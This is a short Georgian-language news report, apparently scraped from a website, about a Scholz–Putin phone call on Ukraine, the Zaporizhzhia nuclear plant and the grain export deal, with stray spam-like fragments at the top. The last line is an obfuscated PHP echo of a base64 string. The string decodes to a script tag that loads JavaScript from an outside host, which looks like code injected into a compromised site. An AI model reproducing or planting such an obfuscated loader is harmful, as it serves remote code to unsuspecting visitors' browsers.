tube
ავერსი jaluzi
ოლაფ შოლცსა და ვლადიმერ პუტინს ​შორის სატელეფონო საუბარი გაიმართა, - ამის შესახებ ინფორმაციას Reuters ავრცელებს. 
 
გავრცელებული ინფორმაციით, ოლაფ შოლცსა და ვლადიმერ პუტინს შორის საუბარი 90 წუთს გრძელდებოდა და მთავარი თემა უკრაინა იყო.
 
მედიის ინფორმაციით, შოლცმა პუტინს უკრაინის კონფლიქტში დიპლომატიური გამოსავლის პოვნისკენ მოუწოდა, რომელიც დაფუძნებული იქნება ცეცხლის შეწყვეტასა და უკრაინის ტერიტორიიდან რუსული ჯარების დაუყონებლივ გაყვანაზე.
 
შოლცმა ასევე აღნიშნა, რომ აუცილებელია ზაპოროჟიეს ატომურ ელექტროსადგურზე უსაფრთხოების უზრუნველყოფა და პუტინს მოუწოდა, სრულად შეასრულოს გაეროს ეგიდით მიღწეული მარცვლეულის ექსპორტის შეთანხმება.
563
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");